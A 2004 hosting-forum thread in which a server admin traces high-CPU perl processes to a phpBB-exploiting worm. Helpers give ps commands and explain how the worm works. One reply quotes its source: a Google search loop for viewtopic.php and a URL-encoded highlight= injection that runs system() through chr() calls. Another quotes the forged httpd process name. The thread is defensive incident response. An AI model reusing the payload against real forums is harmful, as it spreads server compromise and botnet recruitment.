HELP: tracking down runaway perl script


faqall
12-16-2004, 21:04
16:03:22 up 25 days, 21:39, 1 user, load average: 1.92, 1.56, 1.46
83 processes: 79 sleeping, 4 running, 0 zombie, 0 stopped
CPU states: 59.8% user 40.1% system 0.0% nice 0.0% iowait 0.0% idle
Mem: 451136k av, 446852k used, 4284k free, 0k shrd, 47752k buff
201372k active, 205400k inactive
Swap: 979956k av, 67020k used, 912936k free 194472k cached

PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
28013 nobody 20 0 1652 1652 1164 R 44.1 0.3 0:05 0 perl
24986 nobody 20 0 3052 3052 2792 R 43.1 0.6 148:57 0 perl
21738 nobody 9 0 3056 3056 1492 S 7.8 0.6 14:09 0 perl
1076 root 8 0 8224 2516 2476 S 2.9 0.5 54:42 0 httpd



How can I find the source of that? Normally I would just pkill -9 it and restart Apache, but I want to track down the source. This has been happening all too often!

MQ-James
12-16-2004, 21:17
In WHM there is an option where you can view who has used what CPU; maybe this will help.

faqall
12-16-2004, 21:34
Trust me ;) I did that! Because it's running as nobody, it just shows up as nobody!


User Domain %CPU %MEM Mysql Processes
nobody 17.06 0.22 0.0
Top Process %CPU 89.3 -bash
Top Process %CPU 88.7 -bash
Top Process %CPU 87.8 -bash


Those are the top ones in the list. The nobody was red.

MQ-James
12-16-2004, 21:45
If only suexec was secure, then it would be easy, but the fact is it isn't. The only way is trial and error, on my server only one site runs a perl based system, so it's easy to track.

faqall
12-16-2004, 21:49
I'll just run some sort of CPU throttler/limiter on perl. I'll have it kill it after 15-20 min, perhaps less.

mikron15
12-17-2004, 01:18
Did you try clicking APACHE STATUS under the SERVER STATUS category?

It lists the threads, CPU usage, source IPs and other useful info.

psyxakias
12-17-2004, 10:08
28013 nobody 20 0 1652 1652 1164 R 44.1 0.3 0:05 0 perl
24986 nobody 20 0 3052 3052 2792 R 43.1 0.6 148:57 0 perl
21738 nobody 9 0 3056 3056 1492 S 7.8 0.6 14:09 0 perl

The above lines are just showing that a perl script is running with high CPU usage, but you don't seem to know exactly which script. So you better find out by using ps, for example:
ps -uxp 28013
ps -efxup 28013
ps -wwefxup 28013

For more information on what these parameters do, check the ps manpage (man ps).

Also, these processes may be normal if there is some log analyzer daemon (like cPanel installs), which can even slow down the server a lot. So if you don't need it, you may get rid of it.

faqall
12-18-2004, 18:22
Thanks, it seems to be happening all too often now. Sometimes it happens, sometimes it doesn't. I'll look into this.

Again, thank you!

psyxakias
12-18-2004, 18:49
No problem, keep us informed if you make any progress on it. I'm pretty curious if these are cPanel processes like weblog analyzers :p

faqall
12-18-2004, 19:31
I won't know until I notice it again. I'll be sure to keep you updated.

faqall
12-19-2004, 17:42
OK, it's happening again. I'm going to give your suggestion a whack.

faqall
12-19-2004, 17:47
PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
7819 nobody 9 0 1564 1204 1084 S 32.0 0.2 1:58 0 perl
16763 nobody 9 0 1568 1208 1080 S 31.0 0.2 1:58 0 perl


I ran ps -efxup 7819


root@ashley [~]# ps -efxup 7819
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 13312 0.0 0.2 4152 916 pts/3 S 12:41 0:00 su - HOSTNAME=EDITED OUT TERM=xterm SHELL=/bin/bas
root 16106 0.0 0.3 4416 1444 pts/3 S 12:41 0:00 -bash TERM=xterm HOME=/root SHELL=/bin/bash USER=root LOGNAME=r
root 18415 0.0 0.1 2712 708 pts/3 R 12:44 0:00 \_ ps -efxup 7819 HOSTNAME=EDITED OUT SHELL=/bin/
root 1 0.0 0.0 1428 336 ? S Nov20 0:25 init [3] HOME=/ TERM=linux BOOT_IMAGE=2.4.27-grsec BOOT_
root 2 0.0 0.0 0 0 ? SW Nov20 0:08 [keventd]
root 3 0.0 0.0 0 0 ? SWN Nov20 0:00 [ksoftirqd_CPU0]
root 4 0.0 0.0 0 0 ? SW Nov20 6:31 [kswapd]
root 5 0.0 0.0 0 0 ? SW Nov20 0:00 [bdflush]
root 6 0.0 0.0 0 0 ? SW Nov20 0:00 [kupdated]
root 7 0.0 0.0 0 0 ? DW Nov20 6:41 [kjournald]
root 32120 0.0 0.0 0 0 ? SW Nov20 0:00 [kjournald]
root 7016 0.0 0.0 1480 420 ? S Nov20 1:54 syslogd -m 0 CONSOLE=/dev/console TERM=linux INIT_VERSION=sysvi
root 22677 0.0 0.0 1400 336 ? S Nov20 0:06 klogd -x CONSOLE=/dev/console TERM=linux INIT_VERSION=sysvinit-
root 32638 0.0 0.1 2124 492 ? S Nov20 0:02 xinetd -stayalive -pidfile /var/run/xinetd.pid LC_MONETARY=en_U
root 21552 0.0 0.1 1516 452 ? S Nov20 0:05 crond CONSOLE=/dev/console TERM=linux INIT_VERSION=sysvinit-2.8
root 5181 0.0 0.0 3480 292 ? S Nov20 0:00 rhnsd --interval 240 CONSOLE=/dev/console TERM=linux INIT_VERSI
root 14492 0.0 0.0 1584 304 ? S Nov20 0:00 /usr/sbin/portsentry -tcp CONSOLE=/dev/console TERM=linux INIT_
root 25758 0.0 0.0 1400 228 tty1 S Nov20 0:00 /sbin/mingetty tty1 HOME=/ TERM=linux BOOT_IMAGE=2.4.27-grsec B
root 29149 0.0 0.0 5840 384 ? S Nov20 0:03 pure-ftpd (SERVER)
root 7367 0.0 0.0 5496 200 ? S Nov20 0:00 /usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin/pureaut
root 29984 0.0 0.1 3556 580 ? S Dec11 0:18 /usr/sbin/sshd MAILTO=root SHELL=/bin/bash PATH=/sbin:/usr/sbin
root 30624 0.0 0.3 6804 1676 ? S 12:41 0:00 \_ /usr/sbin/sshd MAILTO=root SHELL=/bin/bash PATH=/sbin:/usr/
root 27367 0.0 0.6 9844 3048 ? S Dec12 2:01 /usr/local/bin/perl /usr/bin/mrtg /etc/mrtg/mrtg.cfg TERM=xterm
root 13081 0.0 0.0 2136 428 ? S Dec15 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --pid-fil
root 7708 0.0 0.2 2908 1036 ? S Dec15 0:00 antirelayd
root 27494 0.1 1.6 14804 7668 ? SN Dec15 6:16 cpanellogd - sleeping for logs
root 1542 0.0 0.5 7868 2316 ? S Dec15 0:15 cppop - accepting on port 110 0
root 7424 0.0 0.3 8272 1800 ? S Dec15 0:06 cpsrvd - waiting for connections ections
root 326 0.0 1.8 17716 8432 ? S Dec17 0:03 /usr/local/apache/bin/httpd TERM=xterm PATH=/sbin:/usr/sbin:/bi
nobody 7819 0.0 0.2 5192 1204 ? S Dec17 0:00 perl TERM=xterm OLDPWD=/home/i7daysn/public_html/forum PATH=/sb
root 14730 0.4 0.8 9676 3868 ? S 12:44 0:00 /usr/sbin/exim -Mc 1Cg56V-0002JT-OJ TERM=xterm PATH=/sbin:/usr/


I'm assuming it has something to do with the account "i7daysn".

Correct me if I'm wrong.

faqall
12-26-2004, 01:50
Can someone tell me what the heck this is? It keeps taking me down, and the path doesn't even exist.


nobody 14505 32.1 0.3 5028 3564 ? R 20:43 1:45 /hsphere/shared/apache/bin/httpd -DSSL

psyxakias
12-26-2004, 02:00
You better find who's running it, otherwise you'll get in trouble soon.

This exploit searches in google for websites with viewtopic.php (phpBB forums) and tries to exploit them.

psyxakias
12-26-2004, 02:15
FYI, it's a Brazilian perl script that is used to do the following:
a) searching in google for phpBB forums (viewtopic.php keyword)
b) attempt to exploit webservers using a known PHP vulnerability
c) force the webservers to connect to an IRC server
d) mass-control all these drones for DDoS or any other activities

This script can do a lot of damage by collecting thousands of webservers that are connected to mbit/gigabit lines and establishing multiple gigabit DDoS attacks. I had to terminate 2 IPs today because of it. :smoking:

I identified it from your post because of the name it uses in order to be unnoticeable:
my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Name of the process that will appear in ps #
#----------------------------------------------################################################
You better get rid of it asap and make sure that your server is clean, otherwise abuse reports will start flooding you real bad :drowned: :drowned: :drowned:
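The ps route psyxakias suggests above, and the forged process name in this post, both come down to the same check: do not trust the name a process reports, read the kernel's view of it under /proc. The script below is an added example (not code from the thread or from any tool mentioned in it); it assumes Linux with procfs and the usual coreutils, and the function names are my own.

```shell
#!/bin/sh
# Added example, not code from the thread: look at a suspicious PID through
# /proc instead of trusting what `ps` prints. A script can rewrite its own
# argv[0] (the worm above sets it to ".../httpd -DSSL"), but /proc/<pid>/exe,
# cwd and environ still show the real interpreter, the working directory and
# variables such as OLDPWD that point back at the account it was started from.
# Assumes Linux with procfs; reading another user's environ requires root.

# Real executable behind the PID (symlink resolved by the kernel).
proc_exe() { readlink "/proc/$1/exe" 2>/dev/null; }

# Command line as the process presents it (NUL separators -> spaces).
proc_cmdline() { tr '\0' ' ' < "/proc/$1/cmdline" 2>/dev/null; }

# Current working directory, e.g. the docroot the worm was dropped into.
proc_cwd() { readlink "/proc/$1/cwd" 2>/dev/null; }

# One variable from the process environment, empty if unreadable.
proc_env() { tr '\0' '\n' < "/proc/$1/environ" 2>/dev/null | sed -n "s/^$2=//p"; }

# True (0) when the binary's name differs from the name argv[0] claims.
# Multi-call binaries such as busybox also trip this, so read it as a lead.
argv0_mismatch() {
    exe=$(basename "$(proc_exe "$1")")
    argv0=$(basename "$(proc_cmdline "$1" | cut -d' ' -f1)")
    [ -n "$exe" ] && [ "$exe" != "$argv0" ]
}

# Everything needed to attribute the process, one key=value per line.
inspect_pid() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such pid: $pid" >&2; return 1; }
    printf 'exe=%s\n' "$(proc_exe "$pid")"
    printf 'cmdline=%s\n' "$(proc_cmdline "$pid")"
    printf 'cwd=%s\n' "$(proc_cwd "$pid")"
    printf 'pwd=%s\n' "$(proc_env "$pid" PWD)"
    printf 'oldpwd=%s\n' "$(proc_env "$pid" OLDPWD)"
    if argv0_mismatch "$pid"; then
        echo 'verdict=argv[0] does not match the binary; treat as disguised'
    else
        echo 'verdict=argv[0] matches the binary'
    fi
    # Open files frequently name the script, socket or log being used.
    ls -l "/proc/$pid/fd" 2>/dev/null | sed -n 's/.* -> /fd=/p'
}

# Usage: sh inspect_pid.sh <pid>
if [ -n "${1:-}" ]; then inspect_pid "$1"; fi
```

Run it as root against the PID from top; for the case in this thread, exe would point at the perl binary while cmdline still claims httpd, and cwd or OLDPWD names the account directory.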

faqall
12-26-2004, 02:32
I did find the location of the script, as that site was getting an attack or something like the highlight exploit in phpBB2 :(. They are running the latest versions of everything and the server is running PHP 5, any suggestions?

faqall
12-26-2004, 02:37
Hey, I think I got it, but I really want to be safe... would you be willing to give me a hand?

psyxakias
12-26-2004, 02:44
Sure, message me on MSN (psyxakias@sharktech.net)

faqall
12-26-2004, 09:44
hello,

Over the past few hours I have recompiled Apache several times. Now all my PHP sites are prompting me to download the site. Does anyone have any suggestions?

Thanks in advance

faqall
12-26-2004, 10:13
Sorry, it was suEXEC.

very tired right now :nuts:

faqall
12-26-2004, 15:32
FYI, it's a Brazilian perl script that is used to do the

Well, I cleaned out the /tmp dir and shortly after this nice little file called worm appears. ATTACHED. Have any suggestions now?

Edit:
For now I just followed these steps (http://forums.ev1servers.net/showthread.php?threadid=27771&highlight=noexec+tmp)

crax
12-26-2004, 16:15
Well, from the looks of that it's a virus that got on your server, which uses Google to search for vulnerable phpBB versions and run an exploit on them.

$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";

######################################
for($n=0;$n<90;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";

That finds the vulnerable phpBB board and then runs the following command:

$cmd = '&highlight=%2527%252esystem(chr(99)%252echr(100)%25 2echr(32)%252echr(47)%252echr(116)%252echr(109)%25 2echr(112)%252ec$

So it would look like:

viewtopic.php?t=433493490&highlight=%2527%252esystem(chr(99)%252echr(100)%25 2echr(32)%252echr(47)%252echr(116)%252echr(109)%25 2echr(112)%252ec$

And that's a mysql injection in (binary?) format; just call it an automated script kiddie. :nuts:

But here is my question: how did it get on your server... I would take a look at security a little :nuts:

Hope that helps you!

faqall
12-26-2004, 16:23
I already knew what it was in small detail. Worms blow.

http://forums.ev1servers.net/showthread.php?threadid=51203&highlight=viewtopic.php
http://forums.ev1servers.net/showthread.php?threadid=51836&highlight=viewtopic.php
http://forums.ev1servers.net/showthread.php?threadid=51705&highlight=viewtopic.php

http://forums.ev1servers.net/search.php?action=showresults&searchid=1891561&sortby=lastpost&sortorder=descending

crax
12-26-2004, 16:27
Yeah, one time I had a worm that sent out hundreds of spam emails. They suck A LOT! $#%$ spam! :eek: :nuts:

faqall
12-28-2004, 00:28
Hmm, this nice little SH!# of a worm leaves this behind in the tmp dir along with the worm.txt: a file simply called yay (no extension). ATTACHED.

Edit:
Psyxakias, is version 4.3.10 exploitable by this script? I want to convert to that rather than 5.0.3, as version 5 of PHP breaks way too much :nuts: